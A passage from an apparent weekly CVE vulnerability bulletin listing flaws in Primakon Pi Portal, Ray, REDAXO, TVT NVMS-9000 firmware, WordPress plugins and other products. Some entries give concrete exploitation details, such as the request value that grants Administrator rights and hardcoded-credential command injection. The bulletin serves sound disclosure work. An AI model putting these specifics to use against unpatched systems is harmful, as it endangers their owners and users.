| Primakon Pi Portal--Primakon | Primakon Pi Portal 1.0.18 /api/v2/pp_users endpoint fails to adequately check user permissions before processing a PATCH request to modify the PP_SECURITY_PROFILE_ID. Because of weak access controls any low level user can use this API and change their permission to Administrator by using PP_SECURITY_PROFILE_ID=2 inside body of request and escalate privileges. | 2025-11-25 | not yet calculated | CVE-2025-64064 | https://www.primakon.com/rjesenja/primakon-pcm/ https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64064.md |
| Primakon Pi Portal--Primakon | The Primakon Pi Portal 1.0.18 API /api/V2/pp_udfv_admin endpoint, fails to perform necessary server-side validation. The administrative LoginAs or user impersonation feature is vulnerable to a access control failure. This flaw allows any authenticated low-privileged user to execute a direct PATCH request, enabling them to impersonate any other arbitrary user, including application Administrators. This is due to a Broken Function Level Authorization failure (the function doesn't check the caller's privilege) compounded by an Insecure Design that permits a session switch without requiring the target user's password or an administrative token and only needs email of user. | 2025-11-25 | not yet calculated | CVE-2025-64065 | https://www.primakon.com/rjesenja/primakon-pcm/ https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64065.md |
| Primakon Pi Portal--Primakon | Primakon Pi Portal 1.0.18 REST /api/v2/user/register endpoint suffers from a Broken Access Control vulnerability. The endpoint fails to implement any authorization checks, allowing unauthenticated attackers to perform POST requests to register new user accounts in the application's local database. This bypasses the intended security architecture, which relies on an external Identity Provider for initial user registration and assumes that internal user creation is an administrative-only function. This vector can also be chained with other vulnerabilities for privilege escalation and complete compromise of application. This specific request can be used to also enumerate already registered user accounts, aiding in social engineering or further targeted attacks. | 2025-11-25 | not yet calculated | CVE-2025-64066 | https://www.primakon.com/rjesenja/primakon-pcm/ https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64066.md |
| Primakon Pi Portal--Primakon | Primakon Pi Portal 1.0.18 API endpoints responsible for retrieving object-specific or filtered data (e.g., user profiles, project records) fail to implement sufficient server-side validation to confirm that the requesting user is authorized to access the requested object or dataset. This vulnerability can be exploited in two ways: Direct ID manipulation and IDOR, by changing an ID parameter (e.g., user_id, project_id) in the request, an attacker can access the object and data belonging to another user; and filter Omission, by omitting the filtering parameter entirely, an attacker can cause the endpoint to return an entire unfiltered dataset of all stored records for all users. This flaw leads to the unauthorized exposure of sensitive personal and organizational information. | 2025-11-25 | not yet calculated | CVE-2025-64067 | https://www.primakon.com/rjesenja/primakon-pcm/ https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64067.md |
| py-pdf--pypdf | pypdf is a free and open-source pure-python PDF library. Prior to version 6.4.0, an attacker who uses this vulnerability can craft a PDF which leads to a memory usage of up to 1 GB per stream. This requires parsing the content stream of a page using the LZWDecode filter. This issue has been patched in version 6.4.0. | 2025-11-25 | not yet calculated | CVE-2025-66019 | https://github.com/py-pdf/pypdf/security/advisories/GHSA-m449-cwjh-6pw7 https://github.com/py-pdf/pypdf/commit/96186725e5e6f237129a58a97cd19204a9ce40b2 https://github.com/py-pdf/pypdf/releases/tag/6.4.0 |
| RapidCMS--OpenRapid | OpenRapid RapidCMS 1.3.1 is vulnerable to Cross Site Scripting (XSS) in /user/user-move.php. | 2025-11-24 | not yet calculated | CVE-2025-64047 | http://rapidcms.com https://gist.github.com/b1uel0n3/b105ad05dbcd3fe148a26e8180dddda7 |
| ray-project--ray | Ray is an AI compute engine. Prior to version 2.52.0, developers working with Ray as a development tool can be exploited via a critical RCE vulnerability exploitable via Firefox and Safari. This vulnerability is due to an insufficient guard against browser-based attacks, as the current defense uses the User-Agent header starting with the string "Mozilla" as a defense mechanism. This defense is insufficient as the fetch specification allows the User-Agent header to be modified. Combined with a DNS rebinding attack against the browser, and this vulnerability is exploitable against a developer running Ray who inadvertently visits a malicious website, or is served a malicious advertisement (malvertising). This issue has been patched in version 2.52.0. | 2025-11-26 | not yet calculated | CVE-2025-62593 | https://github.com/ray-project/ray/security/advisories/GHSA-q279-jhrf-cc6v https://github.com/ray-project/ray/commit/70e7c72780bdec075dba6cad1afe0832772bfe09 |
| REDAXO CMS--REDAXO | A stored cross-site scripting (XSS) vulnerability in the module management component in REDAXO CMS 5.20.0 allows remote users to inject arbitrary web script or HTML via the Output code field in modules. The payload is executed when a user views or edits an article by adding slice that uses the compromised module. | 2025-11-25 | not yet calculated | CVE-2025-64049 | https://github.com/redaxo/redaxo https://drive.google.com/drive/folders/1SpwL548ZBRYU_uL8W7Riv7VHshr2UN0R?usp=sharing https://github.com/vettrivel007/CVE-Disclosures/blob/main/CVE-2025-64049.md |
| REDAXO CMS--REDAXO | A Remote Code Execution (RCE) vulnerability in the template management component in REDAXO CMS 5.20.0 allows remote authenticated administrators to execute arbitrary operating system commands by injecting PHP code into an active template. The payload is executed when visitors access frontend pages using the compromised template. | 2025-11-25 | not yet calculated | CVE-2025-64050 | https://github.com/redaxo/redaxo https://drive.google.com/drive/folders/1Via4r4wn5zCcBllWmHpxYweCPgcbN0bz?usp=sharing https://github.com/vettrivel007/CVE-Disclosures/blob/main/CVE-2025-64050.md |
| RSA--RSA | In RSA Authentication Agent before 7.4.7, service paths and shortcut paths may be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks. An adversary can place an executable in a higher-level directory of the path, and Windows will resolve that executable instead of the intended executable. | 2025-11-24 | not yet calculated | CVE-2024-47856 | https://community.rsa.com/s/product-download/a9G4u000000mCOYEAU/rsa-authentication-agent-747-for-microsoft-windows https://community.rsa.com/s/article/RSA-2024-13-RSA-Authentication-Agent-for-Microsoft-Windows-Security-Update |
| Ruckas Unleashed--Ruckus Networks | A reflected Cross site scripting (XSS) vulnerability in Ruckus Unleashed 200.13.6.1.319 via the name parameter to the the captive-portal endpoint selfguestpass/guestAccessSubmit.jsp. | 2025-11-25 | not yet calculated | CVE-2025-63735 | https://www.ruckusnetworks.com/products/network-control-and-management/controller-less/ https://github.com/huthx/CVE-2025-63735-Ruckus-Unleashed-Reflected-XSS |
| Ruoyi--Ruoyi | Ruoyi v4.8.0 vulnerable to Incorrect Access Control. There is a missing checkUserDataScope permission check in the resetPwd Method of SysUserController.java. | 2025-11-26 | not yet calculated | CVE-2025-46174 | https://gitee.com/y_project/RuoYi/issues/IC1JZR https://gitee.com/y_project/RuoYi/commit/ea4af7a8cf54393b11d3d286e0aaeb3df8a9aaef https://gist.github.com/Han-tj/29543ce0dae8cbb3bcbedca3390844a9 |
| Ruoyi--Ruoyi | Ruoyi v4.8.0 is vulnerable to Incorrect Access Control. There is a missing checkUserDataScope permission check in the authRole method of SysUserController.java. | 2025-11-26 | not yet calculated | CVE-2025-46175 | https://gitee.com/y_project/RuoYi/issues/IC1FS0 https://gitee.com/y_project/RuoYi/commit/f935b2782f4237cdbcc13bdce76703e82c42f4fe https://gist.github.com/Han-tj/74d2ed84ede1909da55090fed410d288 |
| Ruoyi--Ruoyi | An issue was discovered in Ruoyi 4.8.1 allowing attackers to gain escalated privileges due to the owning department having higher rights than the active user. | 2025-11-26 | not yet calculated | CVE-2025-56396 | https://gitee.com/y_project/RuoYi/issues/ICJ865 https://gist.github.com/Han-tj/22cfd18fa9f116bb886e8e56782f6865 |
| SDMC--NE6037 | Firmware in SDMC NE6037 routers prior to version 7.1.12.2.44 has a network diagnostics tool vulnerable to a shell command injection attacks. In order to exploit this vulnerability, an attacker has to log in to the router's administrative portal, which by default is reachable only via LAN ports. | 2025-11-27 | not yet calculated | CVE-2025-8890 | https://cert.pl/en/posts/2025/11/CVE-2025-8890 |
| shama--willitmerge | willitmerge is a command line tool to check if pull requests are mergeable. In versions 0.2.1 and prior, there is a command Injection vulnerability in willitmerge. The vulnerability manifests in this package due to the use of insecure child process execution API (exec) to which it concatenates user input, whether provided to the command-line flag, or is in user control in the target repository. At time of publication, no known fix is public. | 2025-11-29 | not yet calculated | CVE-2025-66219 | https://github.com/shama/willitmerge/security/advisories/GHSA-j9wj-m24m-7jj6 https://github.com/shama/willitmerge/blob/2fe91d05191fb05ac6da685828d109a3a5885028/lib/willitmerge.js#L189-L197 |
| Shenzhen TVT Digital Technology Co., Ltd.--NVMS-9000 | Shenzhen TVT Digital Technology Co., Ltd. NVMS-9000 firmware (used by many white-labeled DVR/NVR/IPC products) contains hardcoded API credentials and an OS command injection flaw in its configuration services. The web/API interface accepts HTTP/XML requests authenticated with a fixed vendor credential string and passes user-controlled fields into shell execution contexts without proper argument sanitization. An unauthenticated remote attacker can leverage the hard-coded credential to access endpoints such as /editBlackAndWhiteList and inject shell metacharacters inside XML parameters, resulting in arbitrary command execution as root. The same vulnerable backend is also reachable in some models through a proprietary TCP service on port 4567 that accepts a magic GUID preface and base64-encoded XML, enabling the same command injection sink. Firmware releases from mid-February 2018 and later are reported to have addressed this issue. Exploitation evidence was observed by the Shadowserver Foundation on 2025-01-28 UTC. | 2025-11-24 | not yet calculated | CVE-2018-25126 | https://web.archive.org/web/20180614014914/http://en.tvt.net.cn:80/news/227.html https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://qkl.seebug.org/vuldb/ssvid-97217 https://blogs.juniper.net/en-us/threat-research/iot-botnet-exploiting-tvt-shenzhen-dvrs-still-lingers https://www.vulncheck.com/advisories/tvt-nvms9000-hardcoded-api-credentials-and-command-injection |
| Shenzhen TVT Digital Technology Co., Ltd.--NVMS-9000 | Shenzhen TVT Digital Technology Co., Ltd. NVMS-9000 firmware (used by many white-labeled DVR/NVR/IPC products) versions prior to 1.3.4 contain an authentication bypass in the NVMS-9000 control protocol. By sending a single crafted TCP payload to an exposed NVMS-9000 control port, an unauthenticated remote attacker can invoke privileged administrative query commands without valid credentials. Successful exploitation discloses sensitive information including administrator usernames and passwords in cleartext, network and service configuration, and other device details via commands such as queryBasicCfg, queryUserList, queryEmailCfg, queryPPPoECfg, and queryFTPCfg. | 2025-11-24 | not yet calculated | CVE-2024-14007 | https://ssd-disclosure.com/ssd-advisory-nvms9000-information-disclosure/ https://www.greynoise.io/blog/surge-exploitation-attempts-tvt-dvrs https://undercodetesting.com/eleven11-botnet-mirai-variant-targeting-nvms-9000-devices/ https://www.vulncheck.com/advisories/tvt-nvms9000-unauthenticated-admin-queries-and-information-disclosure |
| SIGB PBP--SIGB | SIGB PMB v8.0.1.14 was discovered to contain multiple SQL injection vulnerabilities in the /opac_css/ajax_selector.php component via the id and datas parameters. | 2025-11-25 | not yet calculated | CVE-2025-61167 | http://pmb.com http://sigb.com https://forge.sigb.net/projects/pmb/wiki/Changelog_801#S%C3%A9curit%C3%A9-2 https://gist.github.com/ZanyMonk/ed12e265f777152c33aeb806a644850e |
| SIGB PBP--SIGB | An issue in the cms_rest.php component of SIGB PMB v8.0.1.14 allows attackers to execute arbitrary code via unserializing an arbitrary file. | 2025-11-25 | not yet calculated | CVE-2025-61168 | http://pmb.com http://sigb.com https://gist.github.com/ZanyMonk/446f6875a2ceb3decef5ff1176428f9e https://forge.sigb.net/projects/pmb/wiki/Changelog_801#S%C3%A9curit%C3%A9-2 |
| Simple SA--Wirtualna Uczelnia | The application contains an insecure 'redirectToUrl' mechanism that incorrectly processes the value of the 'redirectUrlParameter' parameter. The application interprets the entered string of characters as a Java expression, allowing an unauthenticated attacer to perform arbitrary code execution. This issue was fixed in version wu#2016.1.5513#0#20251014_113353 | 2025-11-27 | not yet calculated | CVE-2025-12140 | https://cert.pl/posts/2025/11/CVE-2025-12140/ |
| SiRcom--SMART Alert (SiSA | SiRcom SMART Alert (SiSA) allows unauthorized access to backend APIs. This allows an unauthenticated attacker to bypass the login screen using browser developer tools, gaining access to restricted parts of the application. | 2025-11-25 | not yet calculated | CVE-2025-13483 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-06 |
| SOGo--alinto | alinto SOGo 5.12.3 is vulnerable to Cross Site Scripting (XSS) via the "userName" parameter. | 2025-11-24 | not yet calculated | CVE-2025-63498 | https://github.com/Alinto/sogo/commit/9e20190fad1a437f7e1307f0adcfe19a8d45184c https://github.com/xryptoh/CVE-2025-63498 https://github.com/Alinto/sogo/releases/tag/SOGo-5.12.4 |
| Sony Corporation--SNC-CX600W | Cross-site request forgery vulnerability exists in SNC-CX600W versions prior to Ver.2.8.0. If a user accesses a specially crafted webpage while logged in, unintended operations may be performed. | 2025-11-25 | not yet calculated | CVE-2025-62497 | https://www.sony.com/electronics/support/ip-cameras-fixed/snc-cx600w https://jvn.jp/en/jp/JVN75140384/ |
| Sony Corporation--SNC-CX600W | Cross-site scripting vulnerability exists in SNC-CX600W all versions. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the product. | 2025-11-25 | not yet calculated | CVE-2025-64730 | https://www.sony.com/electronics/support/ip-cameras-fixed/snc-cx600w https://jvn.jp/en/jp/JVN75140384/ |
| SwitchBot--Smart Video Doorbell | Smart Video Doorbell firmware versions prior to 2.01.078 contain an active debug code vulnerability that allows an attacker to connect via Telnet and gain access to the device. | 2025-11-26 | not yet calculated | CVE-2025-64983 | https://www.switch-bot.com/products/switchbot-video-doorbell?srsltid=AfmBOooGEZArqUag9p59qB8ti2fDP0vCOzxX33NGlpJ8yDlZnzC3vJ_f https://jvn.jp/en/jp/JVN67185535 |
| SY-GPON-1110-WDONT--Sryotech | An issue was discovered in Syrotech SY-GPON-1110-WDONT SYRO_3.7L_3.1.02-240517 allowing attackers to exctract the SSL Private Key, CA Certificate, SSL Certificate, and Client Certificates in .pem format in firmware in etc folder. | 2025-11-25 | not yet calculated | CVE-2025-63729 | https://github.com/Yashodhanvivek/CVE-2025-63729-Syrotech-SY-GPON-1110-/blob/main/Syrotech_SY-GPON-1110-WDONT_Security_Assessment.pdf |
| Synergetic Data Systems, Inc.--UnForm Server | UnForm Server versions < 10.1.15 contain an unauthenticated arbitrary file read and SMB coercion vulnerability in the Doc Flow feature's 'arc' endpoint. The Doc Flow module uses the 'arc' handler to retrieve and render pages or resources specified by the user-supplied 'pp' parameter, but it does so without enforcing authentication or restricting path inputs. As a result, an unauthenticated remote attacker can supply local filesystem paths to read arbitrary files accessible to the service account. On Windows deployments, providing a UNC path can also coerce the server into initiating outbound SMB authentication, potentially exposing NTLM credentials for offline cracking or relay. This issue may lead to sensitive information disclosure and, in some environments, enable further lateral movement. | 2025-11-25 | not yet calculated | CVE-2025-34350 | https://unform.com/download/uf101_readme.txt https://www.vulncheck.com/advisories/unform-server-doc-flow-unauthenticated-file-read |
| System USSD Gateway--OpenCode | OpenCode Systems USSD Gateway OC Release: 5 Version 6.13.11 was discovered to contain a SQL injection vulnerability via the ID parameter in the getSubUsersByProvider function. | 2025-11-26 | not yet calculated | CVE-2025-65235 | https://eslam3kl.gitbook.io https://github.com/eslam3kl https://eslam3kl.gitbook.io/blog/web-application-findings/cve-2025-65235-ussd-gw-sql-injection-subusers |
| System USSD Gateway--OpenCode | OpenCode Systems USSD Gateway OC Release: 5 was discovered to contain a SQL injection vulnerability via the Session ID parameter in the /occontrolpanel/index.php endpoint. | 2025-11-26 | not yet calculated | CVE-2025-65236 | https://eslam3kl.gitbook.io https://github.com/eslam3kl https://eslam3kl.gitbook.io/blog/web-application-findings/cve-2025-65236-ussd-gateway-sql-injection-sessions |
| System USSD Gateway--OpenCode | A reflected cross-site scripted (XSS) vulnerability in OpenCode Systems USSD Gateway OC Release: 5 allows attackers to execute arbitrary JavaScript in the context of a user's browser via injecting a crafted payload. | 2025-11-26 | not yet calculated | CVE-2025-65237 | https://eslam3kl.gitbook.io https://github.com/eslam3kl https://eslam3kl.gitbook.io/blog/web-application-findings/cve-2025-65237-ussd-gateway-reflected-cross-site-scripting |
| System USSD Gateway--OpenCode | Incorrect access control in the getSubUsersByProvider function of OpenCode Systems USSD Gateway OC Release: 5 Version 6.13.11 allows attackers with low-level privileges to dump user records and access sensitive information. | 2025-11-26 | not yet calculated | CVE-2025-65238 | https://eslam3kl.gitbook.io https://github.com/eslam3kl https://eslam3kl.gitbook.io/blog/web-application-findings/cve-2025-65238-ussd-gateway-broken-access-control-sessions |
| System USSD Gateway--OpenCode | Incorrect access control in the /aux1/ocussd/trace endpoint of OpenCode Systems USSD Gateway OC Release:5, version 6.13.11 allows attackers with low-level privileges to read server logs. | 2025-11-26 | not yet calculated | CVE-2025-65239 | https://eslam3kl.gitbook.io https://github.com/eslam3kl https://eslam3kl.gitbook.io/blog/web-application-findings/cve-2025-65239-ussd-gateway-broken-access-control-logs |
| Taclia--Taclia's web application | Cross-Site Scripting (XSS) vulnerability stored in tha Taclia web application, where the uploaded SVG images are not properly sanitized. This allows to the attackers to embed malicious scripts in SVG files such as image profiles, which are then stored on the server and executed in the context of any user who accesses the compromised resource. | 2025-11-24 | not yet calculated | CVE-2025-41087 | https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-xss-stored-taclias-web-application |
| Tellion, Inc.--HN-2204AP Router | Tellion HN-2204AP routers contain an unauthenticated configuration disclosure vulnerability in the /cgi-bin/system_config_file management endpoint. The endpoint allows remote retrieval of a compressed configuration archive without requiring authentication or authorization. The exposed configuration may include administrative credentials, wireless keys, and other sensitive settings, enabling an unauthenticated attacker to obtain information that can facilitate further compromise of the device or network. | 2025-11-26 | not yet calculated | CVE-2019-25227 | https://packetstorm.news/files/id/154752/ https://web.archive.org/web/20190525010559/https://www.tellion.com/ https://www.vulncheck.com/advisories/tellion-hn2204ap-unauthenticated-config-disclosure |
| TEW-657BRM--TRENDnet | TRENDnet TEW-657BRM 1.00.1 has an authenticated remote OS command injection vulnerability in the setup.cgi binary, exploitable via the HTTP parameters "command", "todo", and "next_file," which allows an attacker to execute arbitrary commands with root privileges. | 2025-11-26 | not yet calculated | CVE-2025-65202 | https://github.com/WhereisRain/TEW-657BRM |
| The Ray Team--Anyscale Ray | Anyscale Ray 2.52.0 contains an insecure default configuration in which token-based authentication for Ray management interfaces (including the dashboard and Jobs API) is disabled unless explicitly enabled by setting RAY_AUTH_MODE=token. In the default unauthenticated state, a remote attacker with network access to these interfaces can submit jobs and execute arbitrary code on the Ray cluster. NOTE: The vendor plans to enable token authentication by default in a future release. They recommend enabling token authentication to protect your cluster from unauthorized access. | 2025-11-27 | not yet calculated | CVE-2025-34351 | https://docs.ray.io/en/latest/ray-security/token-auth.html https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-w8vc-465m-jjw6 https://www.vulncheck.com/advisories/anyscale-ray-token-authentication-disabled-by-default-insecure-configuration |
| thingsboard--thingsboard | ThingsBoard in versions prior to v4.2.1 allows an authenticated user to upload malicious SVG images via the "Image Gallery", leading to a Stored Cross-Site Scripting (XSS) vulnerability. The exploit can be triggered when any user accesses the public API endpoint of the malicious SVG images, or if the malicious images are embedded in an `iframe` element, during a widget creation, deployed to any page of the platform (e.g., dashboards), and accessed during normal operations. The vulnerability resides in the `ImageController`, which fails to restrict the execution of JavaScript code when an image is loaded by the user's browser. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions. | 2025-11-27 | not yet calculated | CVE-2025-3261 | https://advisory.checkmarx.net/advisory/CVE-2025-3261/ https://github.com/thingsboard/thingsboard/commit/b2ae6f92d12206ea185a2e882945a6b69234bf03 |
| TIMLEGGE--XML::Sig | XML-Sig versions 0.27 through 0.67 for Perl incorrectly validates XML files if signatures are omitted. An attacker can remove the signature from the XML document to make it pass the verification check. XML-Sig is a Perl module to validate signatures on XML files. An unsigned XML file should return an error message. The affected versions return true when attempting to validate an XML file that contains no signatures. | 2025-11-26 | not yet calculated | CVE-2025-40934 | https://github.com/perl-net-saml2/perl-XML-Sig/issues/63 https://github.com/perl-net-saml2/perl-XML-Sig/pull/64 |
| Tinyproxy--Tinyproxy | Tinyproxy through 1.11.2 contains an integer overflow vulnerability in the strip_return_port() function within src/reqs.c. | 2025-11-26 | not yet calculated | CVE-2025-63938 | https://github.com/tinyproxy/tinyproxy/issues/586 https://github.com/tinyproxy/tinyproxy/commit/3c0fde94981b025271ffa1788ae425257841bf5a https://github.com/rayinaw/my-hub/blob/main/CVE-2025-63938/DISCLOSURE.md |
| Tuya Smart--Tuya | Cross-Site Request Forgery (CSRF) vulnerability in the OAuth implementation of the Tuya SDK 6.5.0 for Android and iOS, affects the Tuya Smart and Smartlife mobile applications, as well as other third-party applications that integrate the SDK, allows an attacker to link their own Amazon Alexa account to a victim's Tuya account. The applications fail to validate the OAuth state parameter during the account linking flow, enabling a cross-site request forgery (CSRF)-like attack. By tricking the victim into clicking a crafted authorization link, an attacker can complete the OAuth flow on the victim's behalf, resulting in unauthorized Alexa access to the victim's Tuya-connected devices. This affects users regardless of prior Alexa linkage and does not require the Tuya application to be active at the time. Successful exploitation may allow remote control of devices such as cameras, doorbells, door locks, or alarms. | 2025-11-24 | not yet calculated | CVE-2025-56400 | http://tuya.com https://src.tuya.com/announcement/30 |
| Ubuntu--edk2 | The Ubuntu edk2 UEFI firmware packages accidentally allowed the UEFI Shell to be accessed in Secure Boot environments, possibly allowing bypass of Secure Boot constraints. Versions 2024.05-2ubuntu0.3 and 2024.02-2ubuntu0.3 disable the Shell. Some previous versions inserted a secure-boot-based decision to continue running inside the Shell itself, which is believed to be sufficient to enforce Secure Boot restrictions. This is an additional repair on top of the incomplete fix for CVE-2023-48733. | 2025-11-26 | not yet calculated | CVE-2025-2486 | https://bugs.launchpad.net/ubuntu/+source/edk2/+bug/2101797 |
| Unknown--Backup Migration | The Backup Migration WordPress plugin before 2.0.0 does not properly generate its backup path in certain server configurations, allowing unauthenticated users to fetch a log that discloses the backup filename. The backup archive is then downloadable without authentication. | 2025-11-24 | not yet calculated | CVE-2025-12394 | https://wpscan.com/vulnerability/e61293d0-2e1b-4dac-96c5-97fa17e38b16/ |
| Unknown--Broken Link Manager | The Broken Link Manager WordPress plugin through 0.6.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin | 2025-11-24 | not yet calculated | CVE-2025-12629 | https://wpscan.com/vulnerability/528e9775-3a2d-4e52-92f7-f123ad787e7d/ |
| Unknown--Guest posting / Frontend Posting / Front Editor | The Guest posting / Frontend Posting / Front Editor WordPress plugin before 5.0.0 does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue | 2025-11-24 | not yet calculated | CVE-2025-12569 | https://wpscan.com/vulnerability/37586572-33f9-4365-bfce-7db277a8df72/ |
| Unknown--TAX SERVICE Electronic HDM | The TAX SERVICE Electronic HDM WordPress plugin before 1.2.1 does not authorization and CSRF checks in an AJAX action, allowing unauthenticated users to import and execute arbitrary SQL statements | 2025-11-26 | not yet calculated | CVE-2025-12061 | https://wpscan.com/vulnerability/1015dd69-faa5-4008-8884-f497ff980ed3/ |
| Unknown--WordPress eCommerce Plugin | The WordPress eCommerce Plugin WordPress plugin through 2.9.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin | 2025-11-24 | not yet calculated | CVE-2024-14015 | https://wpscan.com/vulnerability/1a70927a-e345-4e2f-98da-1235f4482cc0/ |
| Unknown--WP 2FA | The WP 2FA WordPress plugin does not generate backup codes with enough entropy, which could allow attackers to bypass the second factor by brute forcing them | 2025-11-24 | not yet calculated | CVE-2025-12628 | https://wpscan.com/vulnerability/5e2d033c-dde6-4774-8588-cbe268c0d797/ |
| Veal98 echo--ECHO | An issue was discovered in Veal98 Echo Open-Source Community System 2.2 thru 2.3 allowing an unauthenticated attacker to cause the server to send email verification messages to arbitrary users via the /sendEmailCodeForResetPwd endpoint potentially causing a denial of service to the server or the downstream users. | 2025-11-25 | not yet calculated | CVE-2025-51741 | http://echo.com https://github.com/Veal98/Echo https://gist.github.com/Paxsizy/9d92e8746778cf0926705d89b4f3618c |
| xmall--xmall | Multiple Cross-Site Scripting (XSS) vulnerabilities exist in xmall v1.1 due to improper handling of user-supplied data. User input fields such as username and description are directly rendered into HTML without proper sanitization or encoding, allowing attackers to inject and execute malicious scripts. | 2025-11-29 | not yet calculated | CVE-2025-65540 | https://github.com/Exrick/xmall/issues/101 |
| Xtool AnyScan--Xtooltech | Xtooltech Xtool AnyScan Android Application 4.40.40 and prior is Missing SSL Certificate Validation. The application fails to properly validate the TLS certificate from its update server. An attacker on the same network can exploit this vulnerability by performing a Man-in-the-Middle (MITM) attack to intercept, decrypt, and modify traffic between the application and the update server. This serves as the basis for further attacks, including Remote Code Execution. | 2025-11-24 | not yet calculated | CVE-2025-63432 | https://www.nowsecure.com/blog/2025/07/16/remote-code-execution-discovered-in-xtool-anyscan-app-risks-to-phones-and-vehicles/ https://github.com/ab3lson/cve-references/tree/master/CVE-2025-63432 |
| Xtool AnyScan--Xtooltech | Xtooltech Xtool AnyScan Android Application 4.40.40 and prior uses a hardcoded cryptographic key and IV to decrypt update metadata. The key is stored as a static value within the application's code. An attacker with the ability to intercept network traffic can use this hardcoded key to decrypt, modify, and re-encrypt the update manifest, allowing them to direct the application to download a malicious update package. | 2025-11-24 | not yet calculated | CVE-2025-63433 | https://www.nowsecure.com/blog/2025/07/16/remote-code-execution-discovered-in-xtool-anyscan-app-risks-to-phones-and-vehicles/ https://github.com/ab3lson/cve-references/tree/master/CVE-2025-63433 |
| Xtool AnyScan--Xtooltech | The update mechanism in Xtooltech Xtool AnyScan Android Application 4.40.40 and prior is insecure. The application downloads and extracts update packages containing executable code without performing a cryptographic integrity or authenticity check on their contents. An attacker who can control the update metadata can serve a malicious package, which the application will accept, extract, and later execute, leading to arbitrary code execution. | 2025-11-24 | not yet calculated | CVE-2025-63434 | https://www.nowsecure.com/blog/2025/07/16/remote-code-execution-discovered-in-xtool-anyscan-app-risks-to-phones-and-vehicles/ https://github.com/ab3lson/cve-references/tree/master/CVE-2025-63434 |
| Xtool AnyScan--Xtooltech | Xtooltech Xtool AnyScan Android Application 4.40.40 is Missing Authentication for Critical Function. The server-side endpoint responsible for serving update packages for the application does not require any authentication. This allows an unauthenticated remote attacker to freely download official update packages.. | 2025-11-24 | not yet calculated | CVE-2025-63435 | https://www.nowsecure.com/blog/2025/07/16/remote-code-execution-discovered-in-xtool-anyscan-app-risks-to-phones-and-vehicles/ https://github.com/ab3lson/cve-references/tree/master/CVE-2025-63435 |
| YCCMS 3.4--YCCMS | YCCMS 3.4 contains a stored cross-site scripting (XSS) vulnerability in the article management functionality. The vulnerability exists in the add() and getPost() functions within the ArticleAction.class.php file due to improper neutralization of user input in the article title field. | 2025-11-24 | not yet calculated | CVE-2025-64048 | http://yccms.com https://gist.github.com/b1uel0n3/8354650e683ffb0812bfe72b702b482d |
| youlai-boot v2.21--youlai | Incorrect access control in youlai-boot v2.21.1 allows attackers to escalate privileges and access the Administrator backend. | 2025-11-26 | not yet calculated | CVE-2025-55469 | https://gitee.com/youlaiorg/youlai-boot/issues/ICFCOK https://gitee.com/youlaiorg/youlai-boot https://gist.github.com/old6ma/d6e19c9efbe28431f4c27c063cc9cbb8 |
| youlai-boot v2.21--youlai | Incorrect access control in the getUserFormData function of youlai-boot v2.21.1 allows attackers to access sensitive information for other users. | 2025-11-26 | not yet calculated | CVE-2025-55471 | https://gitee.com/youlaiorg/youlai-boot https://gitee.com/youlaiorg/youlai-boot/issues/ICFBW8 https://gist.github.com/old6ma/08d83e5aa7d47e7ff18b23337ccd1f1d |
| ZIRA Group WBRM 7.0--Zira Group | ZIRA Group WBRM 7.0 is vulnerable to SQL Injection in referenceLookupsByTableNameAndColumnName. | 2025-11-24 | not yet calculated | CVE-2025-56401 | http://wbrm.com https://mstreet97.github.io/security/cve/sqli/2025/07/25/Zira-WBRM-SQL-Injection-CVE-2025-56401.html |
Vulnerability Summary for the Week of November 17, 2025
Posted on Monday November 24, 2025
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| ABB--ABB Ability Edgenius | Authentication Bypass Using an Alternate Path or Channel vulnerability in ABB ABB Ability Edgenius.This issue affects ABB Ability Edgenius: 3.2.0.0, 3.2.1.1. | 2025-11-20 | 9.6 | CVE-2025-10571 | https://search.abb.com/library/Download.aspx?DocumentID=7PAA022088&LanguageCode=en&DocumentPartId=&Action=Launch   |
| AMD--AMD StoreMI | A DLL hijacking vulnerability in AMD StoreMIâ„¢ could allow an attacker to achieve privilege escalation, potentially resulting in arbitrary code execution. | 2025-11-23 | 7.3 | CVE-2024-21922 | https://www.amd.com/en/resources/product-security/bulletin/amd-sb-4010.html   |
| AMD--AMD StoreMI | Incorrect default permissions in AMD StoreMIâ„¢ could allow an attacker to achieve privilege escalation potentially resulting in arbitrary code execution. | 2025-11-23 | 7.3 | CVE-2024-21923 | https://www.amd.com/en/resources/product-security/bulletin/amd-sb-4010.html   |
| appsbd--Vitepos Point of Sale (POS) for WooCommerce | The Vitepos - Point of Sale (POS) for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the insert_media_attachment() function in all versions up to, and including, 3.3.0. This is due to the save_update_category_img() function accepting user-supplied file types without validation when processing category images. This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which makes remote code execution possible. | 2025-11-21 | 8.8 | CVE-2025-13156 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bd478bb7-f0d7-4a29-8236-96ad69b5ae67?source=cve https://plugins.trac.wordpress.org/changeset/3398044   |
